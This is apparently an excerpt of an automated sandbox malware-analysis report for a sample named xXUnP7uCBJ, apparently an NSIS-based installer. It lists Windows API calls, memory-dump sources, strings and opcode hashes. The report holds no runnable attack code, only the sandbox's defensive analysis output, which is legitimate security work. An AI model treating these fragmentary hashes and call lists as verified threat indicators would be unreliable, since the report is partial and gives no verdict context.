                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: N
                                                                                                              • API String ID: 3103080414-1130791706
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A
                                                                                                              • API String ID: 2624150263-3645020878
                                                                                                              • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              • Null, xrefs: 00403029
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                              • soft, xrefs: 00403020
                                                                                                              • Inst, xrefs: 00403017
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-787788815
                                                                                                              • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-730719616
                                                                                                              • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
